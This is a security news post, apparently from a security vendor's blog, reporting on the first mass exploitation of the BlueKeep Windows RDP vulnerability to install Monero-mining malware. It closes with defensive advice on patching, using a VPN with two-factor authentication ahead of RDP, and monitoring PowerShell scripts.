Threat Watch

“BlueKeep” Windows RDP Vulnerability Exploited Last Weekend

Microsoft issued a security patch for Windows systems in May of 2019 to close a serious vulnerability in the Remote Desktop Protocol (RDP) system that could allow an attacker to run programs and gain control of vulnerable Windows computers remotely.  Despite dire warnings from Microsoft and U.S. Government officials to apply the security patch as soon as possible, millions of Windows systems connected to the Internet have remained unpatched and vulnerable to exploitation, leading security researchers to predict that a malware worm will likely take advantage of these vulnerable systems and mass-scan the Internet for more vulnerable systems–possibly leading to network congestion and worldwide slowing of data flow. On Saturday, November 2nd, security researchers running “honeypot” systems detected most of the honeypot systems with RDP port 3389 exposed to the Internet reporting a crash, which appeared to be related to exploitation activity.  Closer examination by Marcus Hutchins, a security researcher from Kryptos Logic, confirmed that an attacker had used pieces of a publicly-available BlueKeep exploit from the penetration-testing tool Metasploit in an attempt to run a series of PowerShell scripts that result in downloading and running a malware program designed to mine Monero cryptocurrency.  The Monero mining malware misuses computer resources and electricity to generate money for the attacker while slowing down the victim’s computer, but it would not allow the attacker to steal or destroy files.  However, the same exploit could have been used to install any other type of malware, including Remote Access Trojans (RATs) or ransomware.


Although the first reported mass exploitation of the BlueKeep vulnerability was not as damaging as it could have been, it still serves as a serious warning to any company or organization that has not yet applied Microsoft’s patch from May. In addition to the danger posed by allowing unpatched computers to be connected to the Internet, it is also dangerous to allow unfettered access to Remote Desktop Protocol (RDP port 3389); attackers launch password-guessing attacks against exposed RDP constantly, resulting in many breaches with serious consequences. The best practice for allowing employees remote access is to use a Virtual Private Network (VPN) with client certificates and two-factor authentication (2FA) required to login. RDP access can be granted only after first connecting to the VPN. A good defense-in-depth strategy should also be capable of detecting and reporting unusual PowerShell scripts running on any computer system in a corporate network. The Binary Defense Security Operations Center (SOC) analysts monitor for PowerShell scripts and inspect unusual scripts to uncover signs of attacker behavior on protected endpoints.

Read more here: